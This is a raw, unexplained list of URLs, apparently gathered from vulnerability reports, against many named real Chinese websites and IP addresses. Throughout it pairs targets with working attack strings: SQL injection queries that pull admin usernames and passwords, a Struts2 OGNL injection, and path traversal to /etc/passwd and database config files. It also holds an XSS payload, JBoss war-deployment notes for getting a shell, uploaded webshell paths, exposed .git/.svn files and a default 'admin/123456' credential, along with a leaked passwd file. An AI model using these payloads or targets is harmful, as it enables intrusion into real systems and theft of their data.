http://124.42.9.93 http://124.42.9.90 http://cjcx.nsjy.com/ccpro/view/score/examAction!userLogin.action存在命令执行漏洞 https://www.labi.com/resetPwdByPhone?step=1 http://www.labi.com/passport/resetPwd http://passportm.linekong.com/epassport_mid/xmlRpcServerServlet http://yt.linekong.com/adCount.php?mid=@1,http://hero.linekong.com/adCount.php?mid=@2,http://ss.linekong.com/adCount.php?mid=@3,http://xy.linekong.com/adCount.php?mid=@4,http://dxxd.linekong.com/adCount.php?mid=@7,http://yb.linekong.com/adCount.php?mid=@508,http://yb.linekong.com/adCount.php?mid=@8,http://yt2.linekong.com/adCount.php?mid=@10,http://xz.028yx.com/adCount.php?mid=@749,http://fr.linekong.com/adCount.php?mid=@750,http://ms.linekong.com/adCount.php?mid=@513,http://rx.linekong.com/adCount.php?mid=@11,http://ms.linekong.com/adCount.php?mid=@13,http://tx.028yx.com/adCount.php?mid=@15,http://kx.linekong.com/adCount.php?mid=@509,http://www.huoying.com/adCount.php?mid=@16,http://msz.028yx.com/adCount.php?mid=@774 http://www.linekong.com/adCount/show.php?mid=@1,http://www.linekong.com/adCount/show.php?mid=@2 http://www.linekong.com/adCount/show.php?mid=@3,http://www.linekong.com/adCount/show.php?mid=@4 http://59.151.39.186/common/interface/xmlrpc.php http://**.**.**/complaintCenter/portal/jsp/portal/index.jsp 300.cn/liyun@300.cn http://bx.315.com.cn/ http://bx.315.com.cn/mysql/index.php http://3g.happigo.com/default.php?mod=user&act=login这个接口,快乐购物的3g登陆接口,可以看到登陆的地方是有验证码限制的 http://www.labi.com http://www.labi.com/groups/ http://www.labi.com/groups/1930/feeds http://www.labi.com/groups/1930%20and%201=2%20union%20select%201,2,3,user%28%29,5,6,7,8,9,10,11/contacts/1 http://119.254.100.43/index/index.html http://www.wankr100.com/ http://common.hao123.com/comment/yingshizhuanti_tieba/list?item_id=20150505789&frame=7&tpl=index_co_tieba&width=958&page=2 http://www.flyrise.cn/ http://oa.shunhengli.com:9090/fenc/syncsubject.jsp?pk_corp=1 http://oa.chnjcdc.com:9090/fenc/syncsubject.jsp?pk_corp=1 http://218.90.146.246:9090/fenc/syncsubject.jsp?pk_corp=1 http://119.97.198.27:8080/fenc/syncsubject.jsp?pk_corp=1 http://124.129.26.94:7742/fenc/syncsubject.jsp?pk_corp=1 http://oa.shunhengli.com:9090/indexsearch/filter.jsp?tableId=1 http://119.97.198.27:8080/indexsearch/filter.jsp?tableId=1 http://zszhongyou.gicp.net:9090//indexsearch/filter.jsp?tableId=1 http://218.90.146.246:9090/indexsearch/filter.jsp?tableId=1 http://124.129.26.94:7742/indexsearch/filter.jsp?tableId=1 http://fe.hy-la.com:8088/flex/newsmessage.jsp?uname=1 http://oa.chnjcdc.com:9090/flex/newsmessage.jsp?uname=1 http://oa.suncorps.cn/flex/newsmessage.jsp?uname=1 http://www.kwh.org.mo:4040/flex/newsmessage.jsp?uname=1 http://183.57.22.222:9090/flex/newsmessage.jsp?uname=1 http://oa.chnjcdc.com:9090/feReport/chartList.jsp?delId=1&reportId=1 http://fe.hy-la.com:8088/feReport/chartList.jsp?delId=1&reportId=1 http://oa.suncorps.cn/feReport/chartList.jsp?delId=1&reportId=1 http://124.129.26.94:7742/feReport/chartList.jsp?delId=1&reportId=1 http://oa.shunhengli.com:9090/feReport/chartList.jsp?delId=1&reportId=1 http://admin.sbxq.51wan.com http://mp.linekong.com/login/login.do root:x:0:0:root:/root:/usr/local/bash/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin euosmonitor:x:500:500::/home/euosmonitor:/usr/local/bash/bin/bash gm:x:501:501::/home/gm:/usr/local/bash/bin/bash jboss:x:502:502::/home/jboss:/usr/local/bash/bin/bash msvr:x:503:503::/home/msvr:/usr/local/bash/bin/bash rating:x:504:504::/home/rating:/usr/local/bash/bin/bash rating4lh:x:505:505::/home/rating4lh:/usr/local/bash/bin/bash yyecharging:x:506:506::/home/yyecharging:/usr/local/bash/bin/bash puppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologin zabbix:x:507:507::/:/sbin/nologin eadmobile:x:508:508::/home/eadmobile:/usr/local/bash/bin/bash http://passportm.linekong.com/epassport_mid/xmlRpcServerServlet http://mp.linekong.com http://tdl01.8864.com/lkcps/ http://passportm.linekong.com/epassport_mid/xmlRpcServerServlet jdbc:oracle:oci:@DB_BI jdbc:oracle:oci:@DB_BI http://mp.linekong.com/myname/m.jsp http://youhui.aibang.com/?area=discount&cate=医院%27%20and%20ascii%28mid%28user%28%29,8,1%29%29=49%20and%20%271%27=%271&city=chengdu http://www.zjwsjd.com/display.asp?id=1776 http://www.zjwsjd.com/manager/login.asp http://www.lilywed.cn/tips-11/ http://newadmin.newman.mobi http://103.227.78.174:9001/.git/config http://103.227.78.174:6001/.git/config http://103.227.78.174:4001/.git/config http://103.227.78.174:10001/.git/config http://119.90.53.167:9999/.git/config http://auth.yunshanmeicai.com/.git/config http://bi.yunshanmeicai.com/.git/config http://crm.yunshanmeicai.com/.git/config http://online.yunshanmeicai.com/.git/config http://pms.yunshanmeicai.com/.git/config http://stage.yunshanmeicai.com/.git/config http://supply.yunshanmeicai.com/.git/config http://test.yunshanmeicai.com/.git/config www.maomaogo.com http://inno.ruc.edu.cn/DS/overviewBulletinArticle http://inno.ruc.edu.cn/DS/overviewBulletinArticle?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D https://graph.renren.com/oauth/grant http://graph.renren.com http://chinastudies.ruc.edu.cn/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111 http://12580wap.10086.cn/wap5/user!lry.do http://xuegong.stiei.edu.cn:9093/ZS/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/asp/connector.asp/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/asp/connector.asp http://xuegong.stiei.edu.cn:9091/framework/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/asp/connector.asp/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/asp/connector.asp http://xg.shcc.edu.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/asp/connector.asp/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/asp/connector.asp http://202.38.64.67/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/asp/connector.asp/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/asp/connector.asp http://career.sspu.edu.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/asp/connector.asp/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/asp/connector.asp http://www.xb.uestc.edu.cn/nature/index.php?cid=374%20AND%201=2%20UNION%20SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28select%20user%28%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%20-- http://121.10.6.161:8080/jnjdbm/xgrptwo/index.jsp http://napos.ele.me/login http://www.shjcy.gov.cn:9112/platform/integratedServices.jsp http://www.shjcy.gov.cn:9112/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://220.196.57.132/index.php?wcode=0000&xcode= http://www.docin.com/jsp_cn/login/docincon.jsp这个接口可以看到接口没有任何限制的 http://doc.vlinkage.com/pma/ http://base.vlinkage.com/pma/ http://202.55.1.29:8000/ http://www.gbdjyw.cn/manager/db/ http://www.m6go.com/my/GetBabyInfoById.do?babyid=19682 http://www.m6go.com/my/GetBabyInfoById.do?babyid=19681试试 http://www.m6go.com/my/GetBabyInfoById.do?babyid=1~1982 http://www.xiaozhu.com http://123.232.105.202/ http://erp.suning.com.cn/ http://115.238.57.245/ http://erp.suning.com.cn/uapws/service http://www.sylsw.com/show_house.php?id=151 http://210.38.128.68:8080/ http://210.38.128.68:8080/invoker/JMXInvokerServlet部署war拿shell http://www.hp1997.com/MyCenter/forgetpassUp.aspx http://www.520wqk.com/loginOut.do http://adx.toutiao.com/ http://bgp.cnpc.com.cn/ http://114.251.197.145/ http://114.251.197.149/eps/eps/system/login/login.jsp http://114.251.197.225/eps/system/login/login.jsp http://wooyun.org/bugs/wooyun-2010-082227 http://baike.baidu.com/link?url=cBbo8NVeLHjoio2AL80CZn3RDw-66FcMGU3cc30y7x29cLZFV_wh8XIe-2hDASdQcW8ZmBCvMgQ099aAWGZqeh9VmoRC7MJdK8TjZnmXgQY_EZPPWd4EB_ggDlsbvgFeSfCtFn_CrQibi_xmphlFWQnL51AchltJGhfljnaOuQsHO4x8oeiADRuOr2_gH1I9 http://wsyc.fengshun.cc/admin/ks.htm http://shouji.baidu.com/software/item?docid=5314392&from=as&f=item%40content_bottom_rec%401 http://ask.ci123.com/questions/show/1283372,这是我的提问,http://ask.ci123.com/questions/show/1283372,删除操作, http://123.127.217.117:8080/ThamsWeb/thamsxp/index.htm http://123.127.217.117:8080/jmx-console/ http://123.127.217.117:8080/invoker/JMXInvokerServlet http://58.68.229.116/api/sum_bandwidth_dianxin_xml http://www.sc.hrss.gov.cn/scrswebdongtai/consult/findAll?reply_state=4&consult_type=1&pageSize=6&pageNumber=1 http://video.sdo.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ http://oa.vlinkage.com/pma/ http://lnjoa.vicp.net:88/defaultroot/public/select_user/search_org_list.jsp?searchName= http://222.178.221.54:7001/defaultroot/public/select_user/search_org_list.jsp?searchName= http://58.221.210.116:7001/defaultroot/public/select_user/search_org_list.jsp?searchName= http://oa.orionww.com:7001/defaultroot/public/select_user/search_org_list.jsp?searchName= http://125.95.19.222:7001/defaultroot/public/select_user/search_org_list.jsp?searchName= www.venustech.com.cn/Login.aspx这个接口,是启明星辰主站登陆的接口,可以看到登陆的地方没有任何限制 http://xsc.cqupt.edu.cn/xsc/admin/index.php/login http://**.**.**/ http://wap.sogou.com http://wap.sogou.com/web/searchList.jsp payload:http://wap.sogou.com/web/searchList.jsp?uID=VxJn8XT7ZWCaznT5&v=5&w=1278&t=1431058749585&s_t=1431058756606&keyword=\%27%3Balert%28document.domain%29%3B%3C!--&pg=webSearchList&s= http://admin.qupeiyin.cn/Weixin/test/share?study_show_id=1 http://admin.qupeiyin.cn/Weixin/test/dubbing?course_id= http://www.ceboss.cn/SalesManager/portal/jsp/portal/index.jsp xinnet.com/liyun@xinnet.com http://onlineexam.tnua.edu.tw/schedule.jsp?&recrid=003&recrm=05 ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** http://s.weibo.com/user/&work=%25E4%25BB%258A%25E6%2597%25A5%25E5%25A4%25B4%25E6%259D%25A1 http://www.ghj.anshun.gov.cn/index.asp http://222.86.132.21/admin/upload.asp http://120.132.149.46:8080/meeting/usRegister/userLogin.action存在命令执行漏洞 http://120.132.149.46:8080/meeting/2.jsp http://mem.tsinghua.edu.cn/shownews.asp?news_id=48 http://ugctest.qupeiyin.cn:8084/.svn/entries http://mail.ename.com https://r.webnic.cc/index.jsp 63.com/ID***** http://kh.zuiyouxi.com:8888/ http://myt.51wan.com/.svn/entries http://hdt.51wan.com/.svn/entries http://usert.51wan.com/.svn/entries http://gg.51wan.com/.svn/entries http://www.lnsstzx.com:9999/ThamsWeb/thamsxp/ http://www.lnsstzx.com:9999/jmx-console http://www.lnsstzx.com:9999/jmx-console部署了wooyun.war http://x.x.x.x/seatListSelect.jsp http://x.x.x.x/ucstarMessage-list-new.jsp http://x.x.x.x/webcall/messageNoteAdd.jsp http://mail.gjqh.com.cn:9090/ucstarMessage-list-new.jsp https://**.**.**/RyanTech/csp http://www.dlqx.gov.cn/admin/vote/manage.jsp http://www.hsort.com/ http://zsjggw.xnu.edu.cn/ http://p.hsort.com/ https://rt-express.com/rt_home/en/ogru_index.html https://rt-express.com/rt_home/rb2/rtf/getRt1Rtf.php?trackNum= http://210.73.44.57:8080/HYDJ/control/main http://210.73.44.57:8080/jmx-console/ http://m.feiniu.com http://test.my.gfan.com/.svn/entries http://118.112.188.6:8040/ThamsWeb/thamsxp/index.htm http://118.112.188.6:8040/jmx-console/ http://118.112.188.6:8040/upload5warn/shell.jsp http://m.jiuxian.com/ http://m.jiuxian.com/m_v1/user/getpwd http://news.ifeng.com/a/20150508/43716946_0.shtml http://tempuri.org/GetDeviceList soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ soap:Body http://tempuri.org/ soap:Body soap:Envelope www.zjggjj.gov.cn/EpointBigFileUpload/xm.asp;jpg www.zjginvest.gov.cn www.zjgfh.gov.cn www.njdjh.com www.jcid.com.cn www.gtfdc.com.cn www.siyangtour.com www.ntkfqztb.cn www.zgysbwg.com www.xn--fiQz9J1qDmuXfyA876Bvs8D.net www.epoint.com.cn www.jsntzj.com www.wzqzgh.org www.fhzbmfw.gov.cn www.jsncpjjr.cn www.ymip.com www.jf.zjg.gov.cn www.synyjq.com www.xn--6kR66F.net www.zjgsf.gov.cn www.zjggjj.gov.cn www2.zjggjj.gov.cn www.ccade.org www.zjggjj.gov.cn http://101.227.2.70/admin.zip http://101.227.2.70/adminsites/test.php http://thor.tongbanjie.com/auth/login http://wenku.baidu.com/view/420413efb84ae45c3b358c91.html http://cmbchina.allyes.com/megagame_detail.php?id=418 http://www.51tek.com/category-384.html http://jpkc.lut.cn/ http://wyjpk.whu.edu.cn/ http://jpk.squ.net.cn http://jp.ycvc.jx.cn/ http://jpkc.huanghuai.edu.cn/ http://youxuan.homeinns.com/Address/UpdateDefaultaddress?id=*****&userid=******* Referrer:http://youxuan.homeinns.com/Address/SelectAddress?FromType=0 http://refer.medlive.cn/control/record.inc.php?action=search&full_name= http://m.vvipone.com/h5/login.html http://csc.zte.com.cn/CALLCENTER/Application/SystemManage/Tlogon.aspx http://csc.zte.com.cn/CALLCENTER/Application/SystemManage/Tlogon.aspx http://xj.digitalchina.com http://xj.digitalchina.com/system/user/add.jsp http://xj.digitalchina.com/system/user/addCustomerInfo.jsp http://xj.digitalchina.com/system/user/updatepass.jsp http://xj.digitalchina.com/system/user/list.jsp http://xj.digitalchina.com/system/role/add.jsp http://xj.digitalchina.com/system/role/list.jsp http://xj.digitalchina.com/system/menu/menu.jsp http://xj.digitalchina.com/system/company/add.jsp http://xj.digitalchina.com/system/role/.svn/text-base/add.jsp.svn-base http://xj.digitalchina.com/system/role/.svn/text-base/list.jsp.svn-base http://xj.digitalchina.com/system/company/.svn/text-base/addNew.jsp.svn-base http://xj.digitalchina.com/system/company/.svn/text-base/edit.jsp.svn-base http://xj.digitalchina.com/system/company/.svn/text-base/list.jsp.svn-base http://xj.digitalchina.com/system/citymanage/.svn/text-base/addcity.jsp.svn-base http://xj.digitalchina.com/system/citymanage/.svn/text-base/addcityIsOut.jsp.svn-base http://xj.digitalchina.com/system/citymanage/.svn/text-base/citylist.jsp.svn-base http://spam.fesco.com.cn/view/rePassword!sendMail.action http://spam.fesco.com.cn/view/login!login.action http://183.223.250.82:81/usercfg/user_loginUI.do http://223.87.12.193/usercfg/user_loginUI.do http://218.27.126.215/usercfg/user_loginUI.do http://60.255.46.54/usercfg/user_loginUI.do http://222.169.193.162/usercfg/user_loginUI.do username:admin password:123456 http://top.digitalchina.com/chat/chat/admin/addUser.jsp http://top.digitalchina.com/chat/chat/admin/editUser.jsp http://top.digitalchina.com/chat/chat/admin/myAdmin.jsphttp://top.digitalchina.com/chat/chat/admin/userList.jsp http://top.digitalchina.com/chat/chat/service/myServiceMain.jsp http://top.digitalchina.com/chat/chat/service/myService.jsp http://kaiyuan.hudong.com:80/download.php?n=HDWiki-v4.0.2GBK-20081106.zip&refer=1 http://fw.rrs.com/snaplb/Wiki/Search/list?pageNum=1&pageSize=10&moduleId=2 http://fw.rrs.com/snaplb/CMS/Search/list?pageNum=1&pageSize=4&modelId=1 http://fw.rrs.com/snaplb/FAQ/FAQList?tLevel=33480a48-0f72-489a-b209-16a7e0331634&pageNum=1&pageSize=5 http://dcncs.digitalchina.com http://dcncs.digitalchina.com/database/数据库的目录,都可以下载下来,我这里没有下载你们的数据,我只不过友情检测一下!没有做任何的破坏,谢谢! http://dcncs.digitalchina.com/log/ http://**.**.**/bugs/wooyun-2010-0105760 http://**.**.**/ http://**.**.** http://59.151.117.186:7001/Login.aspx http://luanshiqu.playcrab.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,10%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 http://luanshiqu.playcrab.com/lsq/login.php http://cy.playcrab.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,10%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 http://cy.playcrab.com/zzjs/login.php http://qilongzhu.playcrab.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,10%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 http://kitas.tongbanjie.com/user/login http://sso.tongbanjie.com/index http://mobile.tcl.com/index.php http://ship.xgimi.com/admin.php?c=login www.baofen.cn)隶属于天弘基金管理有限公司,在2014年6月余额宝上线一周年之际重磅推出,是余额宝用户专属的交流互助平台。 http://www.baofen.cn/wwwroot.tar.gz http://test.gfan.com:8082/struts_spy/example/HelloWorld.action http://test.gfan.com:8082/jmx-console/ http://course.cuc.edu.cn/course/web066/web066/viewPage.php?type=exercise http://course.cuc.edu.cn/course/web066/web066/download.php?filename=Pa-o29rF.DOC http://course.cuc.edu.cn/course/web066/web066/download.php?filename=/../../../../../../etc/passwd http://course.cuc.edu.cn/course/web066/web066/download.php?filename=/../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth0 http://course.cuc.edu.cn/course/web066/web066/download.php?filename=/../download.php http://course.cuc.edu.cn/course/web066/web066/download.php?filename=/../download.php http://course.cuc.edu.cn/course/web066/web066/download.php?filename=/../viewPage.php http://course.cuc.edu.cn/course/web066/web066/download.php?filename=/../include/connDB.php http://youxuan.homeinns.com/Account/login www.lfjcy.gov.cn http://www.lfjcy.gov.cn/activity/downLoad.php?fileName=/activity/upload/1404877864.doc http://www.lfjcy.gov.cn/activity/downLoad.php?fileName=/activity/downLoad.php http://www.lfjcy.gov.cn/activity/downLoad.php?fileName=/activity/index.php http://www.lfjcy.gov.cn/activity/downLoad.php?fileName=/activity/connect.php http://www.lfjcy.gov.cn/activity/login.php http://www.zmagri.gov.cn/先拿下这个网站 www.xyagri.gov.cn这个站的权限 http://service5.qcc.qunar.com/cdrOb!list.action http://myvideo.tiandy.com/login.action?language=cn http://en.tiandy.com/Public/kindeditor/php/demo.php http://en.tiandy.com//Public/uploads/file/20150510/20150510004217_60940.html http://foc.donghaiair.cn/GenericQuery/FlightInfoBoardOA.aspx http://foc.donghaiair.cn/download/oracle817/doc/Support/html/cpyr.htm http://foc.donghaiair.cn/download http://foc.donghaiair.cn/download/ftp%20%E5%AF%86%E7%A0%81.txt http://www.nandu.com/itag/Login这个接口,是南都网络首页登陆的接口,可以看到登陆的地方没有任何限制 http://www.51bi.com/space/biuser/login.jsp?currentUrl=http%3A%2F%2Fwww.51bi.com%2F登陆的地方没有验证码限制 https://**.**.** http://photo.hsw.cn/work/detail?id=8498 http://220.178.8.155//user/reg_check.php?loginname=11111 http://www.tiamaes.com/case/ddxt/ http://117.158.104.47:8000/right/loginPwd.jsp http://117.158.104.47:8000/gps/loginPwd.jsp http://218.29.211.2:8000/right/loginPwd.jsp http://218.29.211.2:8000/oa/loginPwd.jsp http://218.29.211.2:8000/rlzy/loginPwd.jsp http://221.178.242.61:8000/right/loginPwd.jsp http://221.178.242.61:8000/oa/loginPwd.jsp http://221.178.242.61:8000/money/loginPwd.jsp http://218.27.133.147:8000/gps/loginPwd.jsp http://218.27.133.147:8000/right/loginPwd.jsp http://222.179.97.83:8000/right/loginPwd.jsp http://222.179.97.83:8000/gps/loginPwd.jsp http://*/jmx-console http://117.158.104.47:8000/jmx-console http://218.29.211.2:8000/jmx-console http://221.178.242.61:8000/jmx-console http://218.27.133.147:8000/jmx-console http://222.179.97.83:8000/jmx-console http://tdoao123.xicp.net:6680/login.html inurl:house/hs_open.asp?id= www.tzjiahao.cn http://www.smfdcw.com/house/hs_open.asp?id=10%20union%20select%201,2,3,name,5,6,7,pwd,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from%20manager http://www.wlfdcw.com/house/hs_open.asp?id=10%20union%20select%201,2,3,name,5,6,7,pwd,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from%20manager http://www.jsfdcw.cn/house/hs_open.asp?id=10%20union%20select%201,2,3,name,5,6,7,pwd,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from%20manager http://qtfdcw.cn/house/hs_open.asp?id=10%20union%20select%201,2,3,name,5,6,7,pwd,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from%20manager http://yhfdcw.cn/house/hs_open.asp?id=10%20union%20select%201,2,3,name,5,6,7,pwd,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from%20manager inurl:house/showhouse.asp?HID= http://www.wlfdcw.com/house/showhouse.asp?HID=345%20union%20select%201,name,3,4,5,6,7,8,9,10,11,12,13,14,pwd,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40%20from%20manager http://www.smfdcw.com/house/showhouse.asp?HID=403 http://www.zjfdcw.cn/house/showhouse.asp?HID=10 http://www.jsfdcw.cn/house/showhouse.asp?HID=1 http://yhfdcw.cn//house/showhouse.asp?HID=10 http://qtfdcw.cn/house/showhouse.asp?HID=10 http://**.**.**/ http://**.**.** http://user.u17.com/user/ajax.php?mod=title&act=title_vip&title_id=1&_=1431245513778 http://office.feng.com:8099/ http://113.108.53.7:8099/system/systemLogonAction.do http://jgzy.shzj.gov.cn:9088/Lzfxfk/expertBaseRegister.action http://jgzy.shzj.gov.cn:9088/invoker/JMXInvokerServlet部署war进行getshell https://116.228.218.6/AuditSec/view http://refer.medlive.cn/ http://gd.189.cn/goods/html/kdts/main/operIndex.html?orderIndex http://map.iyiyun.com/Admin/login/login www.sdydf.gov.cn http://www.sdyl.gov.cn/login.aspx http://202.109.191.168:8020/Login.aspx http://erp.huipin.com.cn/index.php/Public/login/ http://www.etuan.com/ www.etuan.com https://github.com/8agoXu/myemail/blob/679db277a3b89f66f7fb4a2c97e4789818e6d363/src/test/java/com/util/mail/MailTest.java http://files.nbl-grp.com:800/login.html http://tdoao123.xicp.net:6680/login.html http://file.myfund.com/login.html http://xinhuachongming.com.cn/DSOA_TY/index/index.aspx http://221.199.203.230:9001/dsoa/index/index.aspx http://61.145.231.102/zhuh_2005/index/index_mz.aspx http://oa.xinhuamed.com.cn/DSOA_TY/index/index.aspx http://shkeylab-ceh.xinhuamed.com.cn/dsoa_xhwj/index/index.aspx http://family.xiangyahui.com/?xflag=4 http://**.**.**/FrameSet/Login.aspx http://www.weloan.com/supervisor http://220.163.113.43/dxyqsyspt/DeviceDetail.aspx?yqbh=2014022200 http://220.163.113.43/dxyqsyspt/AfficheDetail.aspx?id=1 http://220.163.113.43/dxyqsyspt/DevicePairList.aspx?flh=03 http://220.163.113.43/dxyqsyspt/BBShuitie.aspx?id=2 http://220.163.113.43/dxyqsyspt/DeviceDetail.aspx?yqbh=2014022200 http://211.67.63.14/dxyq/DeviceDetail.aspx?yqbh=2014022200 http://210.31.141.73/dxyq/DeviceDetail.aspx?yqbh=2014022200 http://211.69.16.30/dxyq/DeviceDetail.aspx?yqbh=2014022200 http://211.64.120.53/dxyq/DeviceDetail.aspx?yqbh=2014022200 http://220.163.113.43/dxyqsyspt/AfficheDetail.aspx?id=1 http://211.67.63.14/dxyq/AfficheDetail.aspx?id=1 http://210.31.141.73/dxyq/AfficheDetail.aspx?id=1 http://211.69.16.30/dxyq/AfficheDetail.aspx?id=1 http://211.64.120.53/dxyq/AfficheDetail.aspx?id=1 http://220.163.113.43/dxyqsyspt/DevicePairList.aspx?flh=03 http://211.67.63.14/dxyq/DevicePairList.aspx?flh=03 http://210.31.141.73/dxyq/DevicePairList.aspx?flh=03 http://211.69.16.30/dxyq/DevicePairList.aspx?flh=03 http://211.64.120.53/dxyq/DevicePairList.aspx?flh=03 http://220.163.113.43/dxyqsyspt/BBShuitie.aspx?id=2 http://211.67.63.14/dxyq/BBShuitie.aspx?id=2 http://210.31.141.73/dxyq/BBShuitie.aspx?id=2 http://211.69.16.30/dxyq/BBShuitie.aspx?id=2 http://211.64.120.53/dxyq/BBShuitie.aspx?id=2 http://221.7.12.181:8080/aic/webnz/welcome-web-home!welcome.action shell:http://221.7.12.181:8080/aic/qwe.jsp http://sp.10jqka.com.cn ID:47312 http://visa.ilvxing.com/ucenter/order/cancel/order_id/47313 http://bk.jinhaidai.com/ http://tools.fund.10jqka.com.cn http://download.10jqka.com.cn http://119.147.23.66/ encap:Ethernet addr:10.11.101.12 Bcast:10.11.101.255 Mask:255.255.255.0 fe7c:17ee/64 Scope:Link MTU:1500 packets:3139641 packets:3168161 txqueuelen:1000 https://mail.cpic.com.cn,存在jboss http://www.mafengwo.cn http://www.rtpnr.com www.rtpnr.com http://www.rtpnr.com www.rtpnr.com url:http://210.73.24.2:8080/hola http://dengbao.moe.edu.cn http://117.121.52.116:8081 http://119.233.255.237/xmbtnwx/weixin/accountmanage/account-query.jsp http://119.233.255.237/jbossws13/index.jsp http://ybfk.jxagri.gov.cn:8080/login.aspx http://www.caizhimofang.com/answer/answer/id/20注入点.html www.caizhimofang.com http://www.caizhimofang.com http://www.gold678.com/chart/WH.aspx?code= http://124.251.11.38:8000/ http://124.251.11.38:7789/ http://demo.gukun.com/admin_/fileupdate.aspx?action=update&name=error.html http://demo.gukun.com/error.html http://www.myzhongjin.com http://cm.justwin.cn/ 